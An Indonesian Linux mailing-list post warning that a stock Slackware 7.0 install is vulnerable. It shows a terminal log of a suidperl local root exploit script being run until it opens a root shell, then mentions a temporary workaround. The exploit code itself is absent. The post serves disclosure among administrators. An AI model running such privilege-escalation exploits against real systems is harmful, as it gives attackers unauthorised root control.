Slackware 7.0 yg masih blom di kutak katik rawan banget nich :(

sniffing:~$ whoami
raincoat
sniffing:~$ ./xperl.sh
Suidperl 5.00503 (and newer) root exploit
-----------------------------------------
Written by Michal Zalewski <[EMAIL PROTECTED]>
With great respect to Sebastian Krahmer...

[*] Using suidperl=/usr/bin/suidperl, suidbin=/usr/bin/passwd...
[+] Checks passed, compiling flares and helper applications...

cc     bighole.c   -o bighole
cc     sush.c   -o sush

[+] Setting up environment...
[+] Starting exploit. It could take up to 5 minutes in order to get
[+] working root shell. WARNING - WARNING - WARNING: it could cause
[+] heavy system load.

[+] VOILA, BABE :-) Entering rootshell...

bash-2.03#
^^^^^^^^^^
ckckckkckkc
kayanya workaroundnya sementara seperti yg di saranin ronny deh :(

ps: om rumy dah coba blom :-) 
-- 
Wassalam,
Vauxhall and I
http://www.boedoet7.org

--------------------------------------------------------------------------
Utk berhenti langganan, kirim email ke [EMAIL PROTECTED]
Informasi arsip di http://www.linux.or.id/milis.php3
Pengelola dapat dihubungi lewat [EMAIL PROTECTED]


Kirim email ke